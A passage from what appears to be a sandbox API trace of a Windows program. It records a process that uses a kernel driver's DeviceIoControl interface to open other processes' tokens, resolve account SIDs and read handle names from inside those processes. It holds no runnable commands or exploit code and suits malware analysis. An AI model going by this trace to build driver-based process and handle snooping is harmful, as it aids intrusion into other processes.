(Object=0xfffff8a000ad3a70) returned 0x54 [0226.148] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0226.148] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0226.148] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7f4) returned 0xc8 [0226.148] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x8335000c, lpInBuffer=0x12d3d0*, nInBufferSize=0x8, lpOutBuffer=0x12d3d8, nOutBufferSize=0x8, lpBytesReturned=0x12d360, lpOverlapped=0x0 | out: lpInBuffer=0x12d3d0*, lpOutBuffer=0x12d3d8*, lpBytesReturned=0x12d360*=0x8, lpOverlapped=0x0) returned 1 [0226.148] ObReferenceObjectByHandle (in: Handle=0xc8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xfffff880052b3668, HandleInformation=0x0 | out: Object=0xfffff880052b3668*=0xfffffa8001fcdb30, HandleInformation=0x0) returned 0x0 [0226.148] ObOpenObjectByPointer (in: Object=0xfffffa8001fcdb30, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xfffff880052b3670 | out: Handle=0xfffff880052b3670*=0xffffffff800005bc) returned 0x0 [0226.148] ObfDereferenceObject (Object=0xfffffa8001fcdb30) returned 0x14 [0226.148] ZwOpenProcessToken (in: ProcessHandle=0xffffffff800005bc, DesiredAccess=0x8, TokenHandle=0xfffffa8001f3f400 | out: TokenHandle=0xfffffa8001f3f400*=0xc4) returned 0x0 [0226.149] ZwClose (Handle=0xffffffff800005bc) returned 0x0 [0226.149] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0226.149] GetTokenInformation (in: TokenHandle=0xc4, TokenInformationClass=0x1, TokenInformation=0x12d3f0, TokenInformationLength=0x800, ReturnLength=0x12d3c8 | out: TokenInformation=0x12d3f0, ReturnLength=0x12d3c8) returned 1 [0226.149] LookupAccountSidW (in: lpSystemName="", Sid=0x12d400*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), Name=0x12ecb0, cchName=0x12d3c0, ReferencedDomainName=0x12e690, cchReferencedDomainName=0x12e440, peUse=0x12d3e0 | out: Name="5p5NrGJn0jS HALPmcxz", cchName=0x12d3c0, ReferencedDomainName="XDUWTFONO", cchReferencedDomainName=0x12e440, peUse=0x12d3e0) returned 1 [0226.151] CloseHandle (hObject=0xc4) returned 1 [0226.151] CloseHandle (hObject=0xc8) returned 1 [0226.151] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0226.151] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x48, lpOverlapped=0x0) returned 1 [0226.151] PsLookupProcessByProcessId (in: ProcessId=0x7f4, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0226.151] PsAcquireProcessExitSynchronization () returned 0x0 [0226.151] KeStackAttachProcess (in: PROCESS=0xfffffa8001fcdb30, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8001fcdb30, ApcState=0xfffff880052b35d0) [0226.151] ObReferenceObjectByHandle (in: Handle=0x10, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa8001fa4d10, HandleInformation=0x0) returned 0x0 [0226.151] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0226.151] PsReleaseProcessExitSynchronization () returned 0x2 [0226.151] ObfDereferenceObject (Object=0xfffffa8001fcdb30) returned 0x12 [0226.151] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8003081044, Length=0x800, ReturnLength=0xfffff880052b3508 | out: ObjectNameInfo=0xfffffa8003081044, ReturnLength=0xfffff880052b3508) returned 0x0 [0226.151] ObfDereferenceObject (Object=0xfffffa8001fa4d10) returned 0x1 [0226.151] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0226.152] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0226.152] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0226.152] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x6a, lpOverlapped=0x0) returned 1 [0226.152] PsLookupProcessByProcessId (in: ProcessId=0x7f4, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0226.152] PsAcquireProcessExitSynchronization () returned 0x0 [0226.152] KeStackAttachProcess (in: PROCESS=0xfffffa8001fcdb30, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8001fcdb30, ApcState=0xfffff880052b35d0) [0226.152] ObReferenceObjectByHandle (in: Handle=0x1c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa8003a3e260, HandleInformation=0x0) returned 0x0 [0226.152] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0226.152] PsReleaseProcessExitSynchronization () returned 0x2 [0226.152] ObfDereferenceObject (Object=0xfffffa8001fcdb30) returned 0x12 [0226.152] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8003067044, Length=0x800, ReturnLength=0xfffff880052b3508 | out: ObjectNameInfo=0xfffffa8003067044, ReturnLength=0xfffff880052b3508) returned 0x0 [0226.152] ObfDereferenceObject (Object=0xfffffa8003a3e260) returned 0x1 [0226.152] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0226.152] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0226.152] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0226.152] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0226.152] PsLookupProcessByProcessId (in: ProcessId=0x7f4, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0226.152] PsAcquireProcessExitSynchronization () returned 0x0 [0226.152] KeStackAttachProcess (in: PROCESS=0xfffffa8001fcdb30, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8001fcdb30, ApcState=0xfffff880052b35d0) [0226.152] ObReferenceObjectByHandle (in: Handle=0x64, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffff8a000ad3a70, HandleInformation=0x0) returned 0x0 [0226.152] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0226.152] PsReleaseProcessExitSynchronization () returned 0x2 [0226.152] ObfDereferenceObject (Object=0xfffffa8001fcdb30) returned 0x12 [0226.152] ObQueryNameString (in: Object=0xfffff8a000ad3a70, ObjectNameInfo=0xfffffa8003068044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa8003068044, ReturnLength=0xfffff880052b3550) returned 0x0 [0226.152] ObfDereferenceObject (Object=0xfffff8a000ad3a70) returned 0x54 [0226.153] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0226.153] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0226.153] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7e0) returned 0xc8 [0226.153] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x8335000c, lpInBuffer=0x12d3d0*, nInBufferSize=0x8, lpOutBuffer=0x12d3d8, nOutBufferSize=0x8, lpBytesReturned=0x12d360, lpOverlapped=0x0 | out: lpInBuffer=0x12d3d0*, lpOutBuffer=0x12d3d8*, lpBytesReturned=0x12d360*=0x8, lpOverlapped=0x0) returned 1 [0226.153] ObReferenceObjectByHandle (in: Handle=0xc8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xfffff880052b3668, HandleInformation=0x0 | out: Object=0xfffff880052b3668*=0xfffffa8001f5bb30, HandleInformation=0x0) returned 0x0 [0226.153] ObOpenObjectByPointer (in: Object=0xfffffa8001f5bb30, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xfffff880052b3670 | out: Handle=0xfffff880052b3670*=0xffffffff800005bc) returned 0x0 [0226.153] ObfDereferenceObject (Object=0xfffffa8001f5bb30) returned 0x14 [0226.153] ZwOpenProcessToken (in: ProcessHandle=0xffffffff800005bc, DesiredAccess=0x8, TokenHandle=0xfffffa8001f3f400 | out: TokenHandle=0xfffffa8001f3f400*=0xc4) returned 0x0 [0226.153] ZwClose (Handle=0xffffffff800005bc) returned 0x0 [0226.153] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0226.153] GetTokenInformation (in: TokenHandle=0xc4, TokenInformationClass=0x1, TokenInformation=0x12d3f0, TokenInformationLength=0x800, ReturnLength=0x12d3c8 | out: TokenInformation=0x12d3f0, ReturnLength=0x12d3c8) returned 1 [0226.153] LookupAccountSidW (in: lpSystemName="", Sid=0x12d400*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), Name=0x12ecb0, cchName=0x12d3c0, ReferencedDomainName=0x12e690, cchReferencedDomainName=0x12e440, peUse=0x12d3e0 | out: Name="5p5NrGJn0jS HALPmcxz", cchName=0x12d3c0, ReferencedDomainName="XDUWTFONO", cchReferencedDomainName=0x12e440, peUse=0x12d3e0) returned 1 [0226.155] CloseHandle (hObject=0xc4) returned 1 [0226.155] CloseHandle (hObject=0xc8) returned 1 [0226.155] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0226.155] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x48, lpOverlapped=0x0) returned 1 [0226.155] PsLookupProcessByProcessId (in: ProcessId=0x7e0, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0226.155] PsAcquireProcessExitSynchronization () returned 0x0 [0226.155] KeStackAttachProcess (in: PROCESS=0xfffffa8001f5bb30, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8001f5bb30, ApcState=0xfffff880052b35d0) [0226.156] ObReferenceObjectByHandle (in: Handle=0x10, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa8001f74ae0, HandleInformation=0x0) returned 0x0 [0226.156] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0226.156] PsReleaseProcessExitSynchronization () returned 0x2 [0226.156] ObfDereferenceObject (Object=0xfffffa8001f5bb30) returned 0x12 [0226.156] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8003075044, Length=0x800, ReturnLength=0xfffff880052b3508 | out: ObjectNameInfo=0xfffffa8003075044, ReturnLength=0xfffff880052b3508) returned 0x0 [0226.156] ObfDereferenceObject (Object=0xfffffa8001f74ae0) returned 0x1 [0226.156] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0226.156] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0226.156] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0226.156] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x74, lpOverlapped=0x0) returned 1 [0226.156] PsLookupProcessByProcessId (in: ProcessId=0x7e0, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0226.156] PsAcquireProcessExitSynchronization () returned 0x0 [0226.156] KeStackAttachProcess (in: PROCESS=0xfffffa8001f5bb30, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8001f5bb30, ApcState=0xfffff880052b35d0) [0226.156] ObReferenceObjectByHandle (in: Handle=0x1c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa8001f5b070, HandleInformation=0x0) returned 0x0 [0226.156] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0226.156] PsReleaseProcessExitSynchronization () returned 0x2 [0226.156] ObfDereferenceObject (Object=0xfffffa8001f5bb30) returned 0x12 [0226.156] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8003076044, Length=0x800, ReturnLength=0xfffff880052b3508 | out: ObjectNameInfo=0xfffffa8003076044, ReturnLength=0xfffff880052b3508) returned 0x0 [0226.156] ObfDereferenceObject (Object=0xfffffa8001f5b070) returned 0x1 [0226.156] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0226.156] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0226.156] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0226.157] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0226.157] PsLookupProcessByProcessId (in: ProcessId=0x7e0, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0226.157] PsAcquireProcessExitSynchronization () returned 0x0 [0226.157] KeStackAttachProcess (in: PROCESS=0xfffffa8001f5bb30, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8001f5bb30, ApcState=0xfffff880052b35d0) [0226.157] ObReferenceObjectByHandle (in: Handle=0x64, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffff8a000ad3a70, HandleInformation=0x0) returned 0x0 [0226.157] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0226.157] PsReleaseProcessExitSynchronization () returned 0x2 [0226.157] ObfDereferenceObject (Object=0xfffffa8001f5bb30) returned 0x12 [0226.157] ObQueryNameString (in: Object=0xfffff8a000ad3a70, ObjectNameInfo=0xfffffa8003069044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa8003069044, ReturnLength=0xfffff880052b3550) returned 0x0 [0226.157] ObfDereferenceObject (Object=0xfffff8a000ad3a70) returned 0x54 [0226.157] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0226.157] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0226.157] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x640) returned 0xc8 [0226.157] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x8335000c, lpInBuffer=0x12d3d0*, nInBufferSize=0x8, lpOutBuffer=0x12d3d8, nOutBufferSize=0x8, lpBytesReturned=0x12d360, lpOverlapped=0x0 | out: lpInBuffer=0x12d3d0*, lpOutBuffer=0x12d3d8*, lpBytesReturned=0x12d360*=0x8, lpOverlapped=0x0) returned 1 [0226.157] ObReferenceObjectByHandle (in: Handle=0xc8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xfffff880052b3668, HandleInformation=0x0 | out: Object=0xfffff880052b3668*=0xfffffa8001f5eb30, HandleInformation=0x0) returned 0x0 [0226.157] ObOpenObjectByPointer (in: Object=0xfffffa8001f5eb30, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xfffff880052b3670 | out: Handle=0xfffff880052b3670*=0xffffffff800005bc) returned 0x0 [0226.157] ObfDereferenceObject (Object=0xfffffa8001f5eb30) returned 0x14 [0226.157] ZwOpenProcessToken (in: ProcessHandle=0xffffffff800005bc, DesiredAccess=0x8, TokenHandle=0xfffffa8001f3f400 | out: TokenHandle=0xfffffa8001f3f400*=0xc4) returned 0x0 [0226.157] ZwClose (Handle=0xffffffff800005bc) returned 0x0 [0226.157] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0226.158] GetTokenInformation (in: TokenHandle=0xc4, TokenInformationClass=0x1, TokenInformation=0x12d3f0, TokenInformationLength=0x800, ReturnLength=0x12d3c8 | out: TokenInformation=0x12d3f0, ReturnLength=0x12d3c8) returned 1 [0226.158] LookupAccountSidW (in: lpSystemName="", Sid=0x12d400*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), Name=0x12ecb0, cchName=0x12d3c0, ReferencedDomainName=0x12e690, cchReferencedDomainName=0x12e440, peUse=0x12d3e0 | out: Name="5p5NrGJn0jS HALPmcxz", cchName=0x12d3c0, ReferencedDomainName="XDUWTFONO", cchReferencedDomainName=0x12e440, peUse=0x12d3e0) returned 1 [0226.159] CloseHandle (hObject=0xc4) returned 1 [0226.159] CloseHandle (hObject=0xc8) returned 1 [0226.160] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0226.160] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x48, lpOverlapped=0x0) returned 1 [0226.160] PsLookupProcessByProcessId (in: ProcessId=0x640, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0226.160] PsAcquireProcessExitSynchronization () returned 0x0 [0226.160] KeStackAttachProcess (in: PROCESS=0xfffffa8001f5eb30, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8001f5eb30, ApcState=0xfffff880052b35d0) [0226.160] ObReferenceObjectByHandle (in: Handle=0x10, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa8001e7b3b0, HandleInformation=0x0) returned 0x0 [0226.160] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0226.160] PsReleaseProcessExitSynchronization () returned 0x2 [0226.160] ObfDereferenceObject (Object=0xfffffa8001f5eb30) returned 0x12 [0226.160] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8003079044, Length=0x800, ReturnLength=0xfffff880052b3508 | out: ObjectNameInfo=0xfffffa8003079044, ReturnLength=0xfffff880052b3508) returned 0x0 [0226.160] ObfDereferenceObject (Object=0xfffffa8001e7b3b0) returned 0x1 [0226.160] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0226.160] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0226.160] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0226.160] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x8c, lpOverlapped=0x0) returned 1 [0226.160] PsLookupProcessByProcessId (in: ProcessId=0x640, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0226.160] PsAcquireProcessExitSynchronization () returned 0x0 [0226.160] KeStackAttachProcess (in: PROCESS=0xfffffa8001f5eb30, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8001f5eb30, ApcState=0xfffff880052b35d0) [0226.160] ObReferenceObjectByHandle (in: Handle=0x1c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa80020158b0, HandleInformation=0x0) returned 0x0 [0226.160] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0226.161] PsReleaseProcessExitSynchronization () returned 0x2 [0226.161] ObfDereferenceObject (Object=0xfffffa8001f5eb30) returned 0x12 [0226.161] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa800312f044, Length=0x800, ReturnLength=0xfffff880052b3508 | out: ObjectNameInfo=0xfffffa800312f044, ReturnLength=0xfffff880052b3508) returned 0x0 [0226.161] ObfDereferenceObject (Object=0xfffffa80020158b0) returned 0x1 [0226.161] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0226.161] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0226.161] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0226.161] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0226.161] PsLookupProcessByProcessId (in: ProcessId=0x640, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0226.161] PsAcquireProcessExitSynchronization () returned 0x0 [0226.161] KeStackAttachProcess (in: PROCESS=0xfffffa8001f5eb30, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8001f5eb30, ApcState=0xfffff880052b35d0) [0226.161] ObReferenceObjectByHandle (in: Handle=0x64, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffff8a000ad3a70, HandleInformation=0x0) returned 0x0 [0226.161] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0226.161] PsReleaseProcessExitSynchronization () returned 0x2 [0226.161] ObfDereferenceObject (Object=0xfffffa8001f5eb30) returned 0x12 [0226.161] ObQueryNameString (in: Object=0xfffff8a000ad3a70, ObjectNameInfo=0xfffffa8003086044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa8003086044, ReturnLength=0xfffff880052b3550) returned 0x0 [0226.161] ObfDereferenceObject (Object=0xfffff8a000ad3a70) returned 0x54 [0226.161] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0226.161] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0226.161] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7dc) returned 0xc8 [0226.162] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x8335000c, lpInBuffer=0x12d3d0*, nInBufferSize=0x8, lpOutBuffer=0x12d3d8, nOutBufferSize=0x8, lpBytesReturned=0x12d360, lpOverlapped=0x0 | out: lpInBuffer=0x12d3d0*, lpOutBuffer=0x12d3d8*, lpBytesReturned=0x12d360*=0x8, lpOverlapped=0x0) returned 1 [0226.162] ObReferenceObjectByHandle (in: Handle=0xc8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xfffff880052b3668, HandleInformation=0x0 | out: Object=0xfffff880052b3668*=0xfffffa8001f60b30, HandleInformation=0x0) returned 0x0 [0226.162] ObOpenObjectByPointer (in: Object=0xfffffa8001f60b30, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xfffff880052b3670 | out: Handle=0xfffff880052b3670*=0xffffffff800005bc) returned 0x0 [0226.162] ObfDereferenceObject (Object=0xfffffa8001f60b30) returned 0x14 [0226.162] ZwOpenProcessToken (in: ProcessHandle=0xffffffff800005bc, DesiredAccess=0x8, TokenHandle=0xfffffa8001f3f400 | out: TokenHandle=0xfffffa8001f3f400*=0xc4) returned 0x0 [0226.162] ZwClose (Handle=0xffffffff800005bc) returned 0x0 [0226.162] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0226.162] GetTokenInformation (in: TokenHandle=0xc4, TokenInformationClass=0x1, TokenInformation=0x12d3f0, TokenInformationLength=0x800, ReturnLength=0x12d3c8 | out: TokenInformation=0x12d3f0, ReturnLength=0x12d3c8) returned 1 [0226.162] LookupAccountSidW (in: lpSystemName="", Sid=0x12d400*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), Name=0x12ecb0, cchName=0x12d3c0, ReferencedDomainName=0x12e690, cchReferencedDomainName=0x12e440, peUse=0x12d3e0 | out: Name="5p5NrGJn0jS HALPmcxz", cchName=0x12d3c0, ReferencedDomainName="XDUWTFONO", cchReferencedDomainName=0x12e440, peUse=0x12d3e0) returned 1 [0226.164] CloseHandle (hObject=0xc4) returned 1 [0226.164] CloseHandle (hObject=0xc8) returned 1 [0226.164] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0226.164] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x48, lpOverlapped=0x0) returned 1 [0226.164] PsLookupProcessByProcessId (in: ProcessId=0x7dc, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0226.164] PsAcquireProcessExitSynchronization () returned 0x0 [0226.164] KeStackAttachProcess (in: PROCESS=0xfffffa8001f60b30, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8001f60b30, ApcState=0xfffff880052b35d0) [0226.164] ObReferenceObjectByHandle (in: Handle=0x10, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa8001f5a650, HandleInformation=0x0) returned 0x0 [0226.165] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0226.165] PsReleaseProcessExitSynchronization () returned 0x2 [0226.165] ObfDereferenceObject (Object=0xfffffa8001f60b30) returned 0x12 [0226.165] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8003065044, Length=0x800, ReturnLength=0xfffff880052b3508 | out: ObjectNameInfo=0xfffffa8003065044, ReturnLength=0xfffff880052b3508) returned 0x0 [0226.165] ObfDereferenceObject (Object=0xfffffa8001f5a650) returned 0x1 [0226.165] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0226.165] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: 